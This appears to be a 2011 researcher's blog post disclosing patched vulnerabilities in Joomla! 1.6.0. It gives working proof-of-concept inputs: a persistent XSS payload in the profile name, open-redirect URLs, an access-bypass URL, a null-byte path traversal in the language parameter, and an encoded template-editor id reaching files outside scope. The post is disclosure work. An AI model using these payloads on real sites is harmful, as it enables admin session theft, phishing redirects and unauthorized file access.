Joomla! 1.6.0 Multiple Minor Vulnerabilities
Posted in Joomla!
2011-03-08 15:47:09 +0000 UTC
Now that 1.6.1 is officially released, I figured I'd go ahead and publish a few of the "sensitive" bugs I found in 1.6.0.
So without further ado...
Persistent XSS
http://developer.joomla.org/security/news/331-20110204-core-xss-vulnerabilities- Log in as any user
- Edit profile
- Change name:
y"/style="position:absolute;top:0px;left:0px;width:99em;height:99em"/onmouseover="alert(1);//
- Save profile
- Wait for admin to visit administrator/index.php?option=com_users
Redirect
http://developer.joomla.org/security/news/333-20110302-core-redirect-vulnerabilitiesThe following URLs caused off-site redirects.
index.php?option=com_content&view=article&task=vote&id=-1&user_rating=999&url=http%3A%2f%2fjeffchannell.com index.php?option=com_weblinks&task=weblink.add&return=aHR0cDovL2plZmZjaGFubmVsbC5jb20=
Information Disclosure
http://developer.joomla.org/security/news/334-20110303-core-information-disclosureThe following url could be used to see articles regardless of user access level:
index.php?option=com_content&view=articles&layout=modal&tmpl=component
Information Disclosure
http://developer.joomla.org/security/news/332-20110301-core-information-disclosuresaving of user profiles did not properly sanitize the 'language' parameter
- Log in as any user
- visit index.php?option=com_users&view=profile
- click "Edit Profile"
- turn on Tamper Data
- submit form
- edit jform[params][language] and set to ../index.php%00
- submit data
* Failed loading XML file * /var/www/jj/language/../index.php * XML: ParsePI: PI php never end ... * XML: Start tag expected, '<' not found
Unauthorized Access
http://developer.joomla.org/security/news/335-20110304-core-unauthorised-accessThe following URL will allow authenticated users with permission to access the Template Manager to edit files outside the scope of the template:
administrator/index.php?option=com_templates&task=source.edit&id=NTAzOi4uLy4uL2luZGV4LnBocA==